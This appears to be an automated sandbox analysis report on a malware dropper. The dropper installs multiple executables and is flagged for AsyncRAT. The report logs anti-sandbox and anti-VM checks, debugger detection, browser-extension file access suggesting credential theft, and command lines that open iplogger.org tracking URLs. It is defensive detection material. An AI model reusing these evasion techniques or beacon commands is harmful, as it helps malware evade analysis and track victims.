Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\SETUP_~1.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\SETUP_~1.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\SETUP_~1.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\SETUP_~1.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\SETUP_~1.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\SETUP_~1.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\SETUP_~1.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\SETUP_~1.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\SETUP_~1.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\SETUP_~1.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\SETUP_~1.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\SETUP_~1.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\SETUP_~1.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\SETUP_~1.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\SETUP_~1.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\SETUP_~1.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\SETUP_~1.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\SETUP_~1.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\SETUP_~1.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\SETUP_~1.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\SETUP_~1.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\SETUP_~1.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\SETUP_~1.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\SETUP_~1.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\SETUP_~1.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\SETUP_~1.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\SETUP_~1.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\SETUP_~1.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\SETUP_~1.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\SETUP_~1.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\SETUP_~1.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\SETUP_~1.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\SETUP_~1.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\SETUP_~1.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\SETUP_~1.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\SETUP_~1.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\SETUP_~1.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\SETUP_~1.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\SETUP_~1.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\SETUP_~1.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Yara detected AsyncRAT

Source: Yara match

File source: Process Memory Space: SETUP_~1.EXE PID: 7912, type: MEMORYSTR

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Source: SETUP_~1.EXE, 00000027.00000002.737036164.0000000002AEB000.00000004.00000800.00020000.00000000.sdmp, SETUP_~1.EXE, 00000027.00000002.737338077.0000000002AFF000.00000004.00000800.00020000.00000000.sdmp

Binary or memory string: SBIEDLL.DLL

Source: C:\Program Files (x86)\Company\NewProduct\brokerius.exe TID: 8972	Thread sleep time: -75000s >= -30000s
Source: C:\Program Files (x86)\Company\NewProduct\me.exe TID: 9176	Thread sleep time: -115000s >= -30000s
Source: C:\Windows\SysWOW64\timeout.exe TID: 6928	Thread sleep count: 41 > 30

Source: C:\Program Files (x86)\Company\NewProduct\safert44.exe	Last function: Thread delayed
Source: C:\Program Files (x86)\Company\NewProduct\me.exe	Last function: Thread delayed
Source: C:\Program Files (x86)\Company\NewProduct\me.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: C:\Program Files (x86)\Company\NewProduct\namdoitntn.exe

Window / User API: threadDelayed 496

Source: C:\Program Files (x86)\Company\NewProduct\F0geI.exe

Check user administrative privileges: GetTokenInformation,DecisionNodes

graph_15-27668

Source: C:\Program Files (x86)\Company\NewProduct\kukurzka9000.exe

API coverage: 1.2 %

Source: C:\Program Files (x86)\Company\NewProduct\F0geI.exe	Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\freebl3.dll			Jump to dropped file
Source: C:\Program Files (x86)\Company\NewProduct\F0geI.exe	Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\softokn3.dll			Jump to dropped file

Source: C:\Program Files (x86)\Company\NewProduct\brokerius.exe	Registry key enumerated: More than 151 enums for key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
Source: C:\Program Files (x86)\Company\NewProduct\real.exe	Registry key enumerated: More than 151 enums for key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
Source: C:\Program Files (x86)\Company\NewProduct\F0geI.exe	Registry key enumerated: More than 174 enums for key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall

Source: C:\Program Files (x86)\Company\NewProduct\F0geI.exe

15_2_0040ABD8

Source: C:\Program Files (x86)\Company\NewProduct\F0geI.exe	API call chain: ExitProcess graph end node	graph_15-27170
Source: C:\Program Files (x86)\Company\NewProduct\kukurzka9000.exe	API call chain: ExitProcess graph end node	graph_18-8082
Source: C:\Program Files (x86)\Company\NewProduct\kukurzka9000.exe	API call chain: ExitProcess graph end node	graph_18-8085
Source: C:\Program Files (x86)\Company\NewProduct\kukurzka9000.exe	API call chain: ExitProcess graph end node	graph_18-8089
Source: C:\Program Files (x86)\Company\NewProduct\kukurzka9000.exe	API call chain: ExitProcess graph end node	graph_18-8049

Source: C:\Program Files (x86)\Company\NewProduct\real.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\
Source: C:\Program Files (x86)\Company\NewProduct\real.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\
Source: C:\Program Files (x86)\Company\NewProduct\real.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\
Source: C:\Program Files (x86)\Company\NewProduct\real.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\
Source: C:\Program Files (x86)\Company\NewProduct\real.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\
Source: C:\Program Files (x86)\Company\NewProduct\real.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\

Source: SETUP_~1.EXE, 00000027.00000002.737338077.0000000002AFF000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: VMware\|VIRTUAL\|A M I\|Xen
Source: real.exe, 00000017.00000002.465506612.0000000000B54000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: jshainx.exe, 00000019.00000002.747109590.00000000033AB000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: zY617Pdb99+1WvhcD7lo3FrSKwd1Cywd9LMVGmivfhxbGU1DY8x/52zJ+c5pbJNXY0S4sBVdcTu5rKMgFogiqY6ISARX9l0yYlvGnbncaCtzr/0KVM7X9EJNQLEjjeZR2Vb0ytK0gg2tqs+dmyVc5c0X1qCQmPhKEyLEKk0YBV9pIjjEUA53pQGfnnX09MwvgJ4e6CWbxptV1ZgyjYpiWdgKTkH2TdVeQqM4L8IoRtIjkUbhfOeUN+xV3hYhKvrikbZ3Bf2FyyFRKpLoBrLTpcVoJjGKabpfOB86RFe6KtLroDs03pzDlurQGdVCjU/W5TnlqFxWtHNsd4I6NeFxcZ2acDGnUxNBw3VqonnECB6qq0xLVx96B+jq3b1k23jTNg6qFqphvIIqVsuqBtqdNjQNer2RDdGINBptc/R79wobkgS+woYIsQobRsFX2AgOMZSDdr7HsPM9KuVa7dr9n4T6+kgvuRxRs6qmjZc1mqUZu1ldAq29oIdczJR1VG6CA+2vStvIRpmJlRYVMGW7BGor1QGuCL3ZtLSVXK4wBUPPtCRXqyakQ7GEVbOyZinSZrLO/b0hL2FhW6yHsgVbDyc1TsxcmjzVN1SuVX3DiTzVN5JJjGKimpVQs/l0gWn2jk+//+7Vpz/9vu81hXe61VsxDcuanDXluoK1eIj0M6PqNG/l8oYQAIr7W8tw8WFy2Q2s98fJCyHy15CtPtVyEqCKDakQ8LVkm1+dPrQYjKYqLNCRYW6kZZwf/hFU7mf0kcE2xDEkaEThL2VGXlDg13oDa3eaXOjYJ7SC5bLYHVMcIZe2lNNuPmMBIaoWEBFCd8Rvkb1+vYYIg5LEVHfKaXJlgLYjOMWunOjRO6PzkXTHo0M3+H29ZGeLYAKknU40HYOYSxMw6DyhT9bZSP1qX5NR3h0TXfwdMuxTVSQC8rY7FZP8FrLfr7Su7GI89ulB7BClaQM7Bg1sqt2NHGHdSOFrfSTb4dItFQZzN8qmSpsSFyUkcqpm6MrxZr2s0LmZ
Source: SETUP_~1.EXE, 00000027.00000002.737338077.0000000002AFF000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Microsoft\|VMWare\|Virtual
Source: real.exe, 00000017.00000002.462607587.0000000000AFA000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: safert44.exe, 00000018.00000002.703776948.0000000001613000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: brokerius.exe, 0000001A.00000002.679735228.00000000282B2000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: brokerius.exe, 0000001A.00000002.679735228.00000000282B2000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\Z
Source: real.exe, 00000017.00000002.465506612.0000000000B54000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWd

Source: C:\Program Files (x86)\Company\NewProduct\real.exe

Process information queried: ProcessInformation

Source: C:\Program Files (x86)\Company\NewProduct\F0geI.exe

Code function: 15_2_004092CF LocalAlloc,LocalAlloc,LocalAlloc,lstrlen,lstrcpyn,lstrcpyn,lstrlen,lstrcpyn,lstrcpyn,lstrlen,lstrcpyn,lstrcpyn,GetSystemInfo,wsprintfW,LocalFree,LocalFree,LocalFree,LocalFree,

15_2_004092CF

Source: C:\Program Files (x86)\Company\NewProduct\F0geI.exe	Code function: 15_2_004052DA LocalAlloc,StrCpyW,FindFirstFileW,FindFirstFileW,LocalFree,LocalAlloc,PathCombineW,LocalAlloc,PathCombineW,LocalAlloc,StrCpyW,LocalAlloc,lstrlenW,LocalAlloc,CopyFileW,CreateFileW,WideCharToMultiByte,LocalAlloc,WideCharToMultiByte,LocalFree,CloseHandle,DeleteFileW,LocalFree,LocalFree,LocalFree,LocalFree,FindNextFileW,LocalFree,FindClose,	15_2_004052DA
Source: C:\Program Files (x86)\Company\NewProduct\F0geI.exe	Code function: 15_2_00405B5B LocalAlloc,StrCpyW,lstrlenW,FindFirstFileW,FindFirstFileW,LocalFree,LocalAlloc,PathCombineW,LocalFree,LocalAlloc,LocalAlloc,StrCpyW,LocalAlloc,StrCpyW,LocalAlloc,LocalAlloc,lstrlenW,StrRChrW,StrCpyW,lstrlenW,StrCpyW,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalAlloc,CopyFileW,CreateFileW,WideCharToMultiByte,LocalAlloc,WideCharToMultiByte,GetFileSize,LocalFree,CloseHandle,DeleteFileW,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,FindNextFileW,FindNextFileW,LocalFree,FindClose,	15_2_00405B5B
Source: C:\Program Files (x86)\Company\NewProduct\F0geI.exe	Code function: 15_2_0040196E FindFirstFileW,FindFirstFileW,lstrcmpW,LocalAlloc,PathCombineW,LocalFree,FindNextFileW,FindNextFileW,FindClose,StrStrW,StrStrW,LocalAlloc,PathCombineW,lstrlenW,	15_2_0040196E
Source: C:\Program Files (x86)\Company\NewProduct\F0geI.exe	Code function: 15_2_0040B177 LocalAlloc,StrCpyW,FindFirstFileW,FindFirstFileW,LocalAlloc,PathCombineW,LocalFree,LocalAlloc,PathCombineW,LocalAlloc,CopyFileW,CreateFileW,GetFileSize,LocalAlloc,StrCpyW,LocalAlloc,lstrlenW,WideCharToMultiByte,LocalAlloc,WideCharToMultiByte,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,CloseHandle,DeleteFileW,LocalAlloc,StrCpyW,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,DeleteFileW,FindNextFileW,LocalFree,FindClose,	15_2_0040B177
Source: C:\Program Files (x86)\Company\NewProduct\F0geI.exe	Code function: 15_2_00401B05 FindFirstFileW,FindFirstFileW,lstrcmpW,LocalAlloc,PathCombineW,StrStrW,lstrlenW,lstrlenW,LocalAlloc,PathCombineW,LocalFree,lstrlenW,FindNextFileW,FindNextFileW,FindClose,	15_2_00401B05
Source: C:\Program Files (x86)\Company\NewProduct\F0geI.exe	Code function: 15_2_0040AE06 LocalAlloc,LocalAlloc,SHGetSpecialFolderPathW,lstrcmpW,StrCpyW,StrCpyW,FindFirstFileW,FindFirstFileW,LocalFree,LocalFree,lstrcmpW,lstrcmpW,LocalAlloc,PathCombineW,lstrcmpW,LocalAlloc,PathCombineW,LocalAlloc,LocalAlloc,SHGetSpecialFolderPathW,lstrlenW,LocalAlloc,StrCpyW,WideCharToMultiByte,LocalAlloc,WideCharToMultiByte,LocalAlloc,CopyFileW,CreateFileW,GetFileSize,LocalAlloc,StrCpyW,LocalFree,DeleteFileW,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,FindNextFileW,FindNextFileW,LocalFree,LocalFree,FindClose,	15_2_0040AE06
Source: C:\Program Files (x86)\Company\NewProduct\F0geI.exe	Code function: 15_2_00403C8F StrStrW,StrStrW,StrStrW,lstrlenW,LocalAlloc,LocalAlloc,LocalAlloc,lstrlenW,LocalAlloc,lstrlenW,LocalAlloc,LocalAlloc,StrStrW,StrStrW,LocalAlloc,PathCombineW,LocalAlloc,FindFirstFileW,FindFirstFileW,StrStrW,LocalAlloc,StrCpyW,StrRChrW,StrRChrW,LocalAlloc,PathCombineW,LocalFree,LocalFree,FindNextFileW,FindNextFileW,FindClose,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,StrStrW,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,	15_2_00403C8F
Source: C:\Program Files (x86)\Company\NewProduct\F0geI.exe	Code function: 15_2_00401E18 LocalAlloc,LocalAlloc,LocalAlloc,LocalAlloc,PathCombineW,StrCpyW,FindFirstFileW,LocalAlloc,LocalAlloc,LocalAlloc,LocalAlloc,LocalAlloc,LocalAlloc,LocalAlloc,LocalAlloc,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,LocalAlloc,LocalAlloc,StrCpyW,LocalAlloc,WideCharToMultiByte,WideCharToMultiByte,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalAlloc,LocalAlloc,StrCpyW,wsprintfW,PathCombineW,FindFirstFileW,FindFirstFileW,LocalAlloc,LocalAlloc,LocalAlloc,LocalAlloc,LocalAlloc,LocalAlloc,LocalAlloc,LocalAlloc,LocalAlloc,LocalAlloc,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,LocalAlloc,LocalAlloc,StrCpyW,LocalAlloc,WideCharToMultiByte,WideCharToMultiByte,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,	15_2_00401E18
Source: C:\Program Files (x86)\Company\NewProduct\F0geI.exe	Code function: 15_2_0040633E FindFirstFileW,FindFirstFileW,lstrcmpW,LocalAlloc,PathCombineW,LocalFree,FindNextFileW,FindNextFileW,FindClose,lstrlenW,	15_2_0040633E
Source: C:\Program Files (x86)\Company\NewProduct\F0geI.exe	Code function: 15_2_004039D7 LocalAlloc,FindFirstFileW,lstrcmpW,LocalAlloc,PathCombineW,LocalAlloc,CopyFileW,CreateFileW,GetFileSize,LocalAlloc,StrCpyW,WideCharToMultiByte,LocalAlloc,LocalAlloc,WideCharToMultiByte,StrCpyW,LocalFree,LocalFree,LocalFree,LocalFree,FindNextFileW,FindClose,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,DeleteFileW,	15_2_004039D7
Source: C:\Program Files (x86)\Company\NewProduct\F0geI.exe	Code function: 15_2_00406725 LocalAlloc,StrCpyW,StrCpyW,FindFirstFileW,LocalAlloc,PathCombineW,lstrcmpW,LocalAlloc,LocalAlloc,LocalAlloc,StrCpyW,StrCpyW,StrCpyW,LocalAlloc,LocalAlloc,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,LocalAlloc,LocalAlloc,StrCpyW,LocalAlloc,WideCharToMultiByte,WideCharToMultiByte,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,FindNextFileW,FindClose,LocalFree,	15_2_00406725
Source: C:\Program Files (x86)\Company\NewProduct\kukurzka9000.exe	Code function: 18_2_004039D7 LocalAlloc,FindFirstFileW,lstrcmpW,LocalAlloc,PathCombineW,LocalAlloc,CopyFileW,CreateFileW,GetFileSize,LocalAlloc,StrCpyW,WideCharToMultiByte,LocalAlloc,LocalAlloc,WideCharToMultiByte,StrCpyW,LocalFree,LocalFree,LocalFree,LocalFree,FindNextFileW,FindClose,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,DeleteFileW,	18_2_004039D7
Source: C:\Program Files (x86)\Company\NewProduct\kukurzka9000.exe	Code function: 18_2_004052DA LocalAlloc,StrCpyW,FindFirstFileW,LocalFree,LocalAlloc,PathCombineW,LocalAlloc,PathCombineW,LocalAlloc,StrCpyW,LocalAlloc,lstrlenW,LocalAlloc,CopyFileW,CreateFileW,WideCharToMultiByte,LocalAlloc,WideCharToMultiByte,LocalFree,CloseHandle,DeleteFileW,LocalFree,LocalFree,LocalFree,LocalFree,FindNextFileW,LocalFree,FindClose,	18_2_004052DA
Source: C:\Program Files (x86)\Company\NewProduct\kukurzka9000.exe	Code function: 18_2_00405B5B LocalAlloc,StrCpyW,lstrlenW,FindFirstFileW,LocalFree,LocalAlloc,PathCombineW,LocalFree,LocalAlloc,StrCpyW,LocalAlloc,StrCpyW,LocalAlloc,LocalAlloc,lstrlenW,StrRChrW,StrCpyW,lstrlenW,StrCpyW,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalAlloc,CopyFileW,CreateFileW,WideCharToMultiByte,LocalAlloc,WideCharToMultiByte,GetFileSize,LocalFree,CloseHandle,DeleteFileW,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,FindNextFileW,LocalFree,FindClose,	18_2_00405B5B
Source: C:\Program Files (x86)\Company\NewProduct\kukurzka9000.exe	Code function: 18_2_0040196E FindFirstFileW,lstrcmpW,LocalAlloc,PathCombineW,LocalFree,FindNextFileW,FindClose,StrStrW,StrStrW,LocalAlloc,PathCombineW,lstrlenW,	18_2_0040196E
Source: C:\Program Files (x86)\Company\NewProduct\kukurzka9000.exe	Code function: 18_2_0040B177 LocalAlloc,StrCpyW,FindFirstFileW,LocalAlloc,PathCombineW,LocalFree,LocalAlloc,PathCombineW,LocalAlloc,CopyFileW,CreateFileW,GetFileSize,LocalAlloc,StrCpyW,LocalAlloc,lstrlenW,WideCharToMultiByte,LocalAlloc,WideCharToMultiByte,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,CloseHandle,DeleteFileW,LocalAlloc,StrCpyW,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,DeleteFileW,FindNextFileW,LocalFree,FindClose,	18_2_0040B177
Source: C:\Program Files (x86)\Company\NewProduct\kukurzka9000.exe	Code function: 18_2_00401B05 FindFirstFileW,lstrcmpW,LocalAlloc,PathCombineW,StrStrW,lstrlenW,lstrlenW,LocalAlloc,PathCombineW,LocalFree,lstrlenW,FindNextFileW,FindClose,	18_2_00401B05
Source: C:\Program Files (x86)\Company\NewProduct\kukurzka9000.exe	Code function: 18_2_0040AE06 LocalAlloc,LocalAlloc,SHGetSpecialFolderPathW,lstrcmpW,StrCpyW,StrCpyW,FindFirstFileW,LocalFree,LocalFree,lstrcmpW,lstrcmpW,LocalAlloc,PathCombineW,lstrcmpW,LocalAlloc,PathCombineW,LocalAlloc,LocalAlloc,SHGetSpecialFolderPathW,lstrlenW,LocalAlloc,StrCpyW,WideCharToMultiByte,LocalAlloc,WideCharToMultiByte,LocalAlloc,CopyFileW,CreateFileW,GetFileSize,LocalAlloc,StrCpyW,LocalFree,DeleteFileW,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,FindNextFileW,LocalFree,LocalFree,FindClose,	18_2_0040AE06
Source: C:\Program Files (x86)\Company\NewProduct\kukurzka9000.exe	Code function: 18_2_00403C8F StrStrW,StrStrW,StrStrW,lstrlenW,LocalAlloc,LocalAlloc,LocalAlloc,lstrlenW,LocalAlloc,lstrlenW,LocalAlloc,LocalAlloc,StrStrW,StrStrW,LocalAlloc,PathCombineW,LocalAlloc,FindFirstFileW,StrStrW,LocalAlloc,StrCpyW,StrRChrW,StrRChrW,LocalAlloc,PathCombineW,LocalFree,LocalFree,FindNextFileW,FindClose,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,StrStrW,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,	18_2_00403C8F
Source: C:\Program Files (x86)\Company\NewProduct\kukurzka9000.exe	Code function: 18_2_00401E18 LocalAlloc,LocalAlloc,LocalAlloc,LocalAlloc,PathCombineW,StrCpyW,FindFirstFileW,LocalAlloc,LocalAlloc,LocalAlloc,LocalAlloc,LocalAlloc,LocalAlloc,LocalAlloc,LocalAlloc,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,LocalAlloc,LocalAlloc,StrCpyW,LocalAlloc,WideCharToMultiByte,WideCharToMultiByte,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalAlloc,LocalAlloc,StrCpyW,wsprintfW,PathCombineW,FindFirstFileW,LocalAlloc,LocalAlloc,LocalAlloc,LocalAlloc,LocalAlloc,LocalAlloc,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,LocalAlloc,LocalAlloc,StrCpyW,LocalAlloc,WideCharToMultiByte,WideCharToMultiByte,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,	18_2_00401E18
Source: C:\Program Files (x86)\Company\NewProduct\kukurzka9000.exe	Code function: 18_2_00406725 LocalAlloc,StrCpyW,StrCpyW,FindFirstFileW,LocalAlloc,PathCombineW,lstrcmpW,LocalAlloc,LocalAlloc,LocalAlloc,StrCpyW,StrCpyW,StrCpyW,LocalAlloc,LocalAlloc,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,LocalAlloc,LocalAlloc,StrCpyW,LocalAlloc,WideCharToMultiByte,WideCharToMultiByte,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,FindNextFileW,FindClose,LocalFree,	18_2_00406725
Source: C:\Program Files (x86)\Company\NewProduct\kukurzka9000.exe	Code function: 18_2_0040633E FindFirstFileW,lstrcmpW,LocalAlloc,PathCombineW,LocalFree,FindNextFileW,FindClose,lstrlenW,	18_2_0040633E

Source: C:\Program Files (x86)\Company\NewProduct\F0geI.exe

15_2_00408ADD

Source: C:\Program Files (x86)\Company\NewProduct\F0geI.exe	Code function: 15_2_0208092B mov eax, dword ptr fs:[00000030h]		15_2_0208092B
Source: C:\Program Files (x86)\Company\NewProduct\F0geI.exe	Code function: 15_2_02080D90 mov eax, dword ptr fs:[00000030h]		15_2_02080D90

Source: C:\Program Files (x86)\Company\NewProduct\ordo_sec666.exe

Process queried: DebugPort

Source: C:\Windows\SysWOW64\taskkill.exe	Process token adjusted: Debug
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\SETUP_~1.EXE	Process token adjusted: Debug
Source: C:\Windows\SysWOW64\taskkill.exe	Process token adjusted: Debug

Source: C:\Program Files (x86)\Company\NewProduct\kukurzka9000.exe

Memory protected: page write copy | page execute | page execute read | page execute and read and write | page guard

Source: C:\Users\user\Desktop\9n6ctoq7cn.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://iplogger.org/1ARmX4	Jump to behavior
Source: C:\Users\user\Desktop\9n6ctoq7cn.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://iplogger.org/1AAmX4	Jump to behavior
Source: C:\Users\user\Desktop\9n6ctoq7cn.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://iplogger.org/1AFmX4	Jump to behavior
Source: C:\Users\user\Desktop\9n6ctoq7cn.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://iplogger.org/1AGmX4	Jump to behavior
Source: C:\Users\user\Desktop\9n6ctoq7cn.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://iplogger.org/1AJmX4	Jump to behavior
Source: C:\Users\user\Desktop\9n6ctoq7cn.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://iplogger.org/1AKmX4	Jump to behavior
